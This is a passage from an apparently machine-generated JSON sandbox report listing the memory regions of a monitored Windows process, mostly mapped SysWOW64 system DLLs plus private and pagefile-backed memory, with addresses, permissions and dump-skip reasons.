"c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1179648, "timestamp": "00:01:24.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 7143423, "entry_point": 0, "filename": null, "id": "region_2787", "name": "private_0x00000000005d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6094848, "timestamp": "00:01:24.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1788391423, "entry_point": 1787433934, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_2788", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:24.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788473343, "entry_point": 1788416673, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_2789", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:24.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1788477440, "type": "region", "version": 1 }, "end_va": 1788514303, "entry_point": 1788482982, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_2790", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1788477440, "timestamp": "00:01:24.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788542976, "type": "region", "version": 1 }, "end_va": 1788612607, "entry_point": 1788547840, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_2791", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788542976, "timestamp": "00:01:24.052", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788891135, "entry_point": 1788679125, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_2792", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:24.052", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_2793", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:24.053", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2794", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:24.053", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2795", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:24.053", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_2796", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:24.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_2797", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:24.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2798", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:24.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2799", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:24.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2800", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:24.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2801", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:24.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2802", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:24.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2803", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:24.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2804", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:24.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2805", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:24.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2806", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:24.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2807", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:24.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2808", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:24.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2809", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:24.061", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2810", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:24.061", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2811", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:24.062", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2812", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:24.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2813", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:24.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2814", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:24.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2815", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:24.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2816", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:24.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 5734399, "entry_point": 0, "filename": null, "id": "region_2817", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:01:24.075", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2818", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:24.075", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2819", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:24.076", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 487423, "entry_point": 0, "filename": null, "id": "region_2820", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:24.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 532479, "entry_point": 0, "filename": null, "id": "region_2821", "name": "pagefile_0x0000000000080000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 524288, "timestamp": "00:01:24.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 868351, "entry_point": 851968, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_2822", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:01:24.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1642495, "entry_point": 0, "filename": null, "id": "region_2823", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:24.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_2824", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:01:24.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 1769472, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_2825", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 1769472, "timestamp": "00:01:24.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2559999, "entry_point": 0, "filename": null, "id": "region_2826", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:01:24.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_2827", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:01:24.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_2828", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:01:24.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 8720383, "entry_point": 0, "filename": null, "id": "region_2829", "name": "pagefile_0x00000000006d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7143424, "timestamp": "00:01:24.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 29753343, "entry_point": 0, "filename": null, "id": "region_2830", "name": "pagefile_0x0000000000860000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8781824, "timestamp": "00:01:24.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31129600, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_2831", "name": "private_0x0000000001db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31129600, "timestamp": "00:01:24.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2832", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:24.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2833", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:24.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_2834", "name": "pagefile_0x0000000000280000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2621440, "timestamp": "00:01:24.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_2835", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:24.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_2836", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:24.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30474240, "type": "region", "version": 1 }, "end_va": 30736383, "entry_point": 0, "filename": null, "id": "region_2837", "name": "private_0x0000000001d10000", "norm_filename": null, "region_type": "private_memory", "start_va": 30474240, "timestamp": "00:01:24.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 32440319, "entry_point": 0, "filename": null, "id": "region_2838", "name": "private_0x0000000001df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31391744, "timestamp": "00:01:24.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_2839", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:24.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 29753344, "type": "region", "version": 1 }, "end_va": 30015487, "entry_point": 0, "filename": null, "id": "region_2840", "name": "private_0x0000000001c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 29753344, "timestamp": "00:01:24.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32440320, "type": "region", "version": 1 }, "end_va": 35385343, "entry_point": 32440320, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2841", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32440320, "timestamp": "00:01:24.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 36241407, "entry_point": 0, "filename": null, "id": "region_2842", "name": "private_0x0000000002250000", "norm_filename": null, "region_type": "private_memory", "start_va": 35979264, "timestamp": "00:01:24.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2843", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:24.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2844", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:24.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2845", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:24.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No 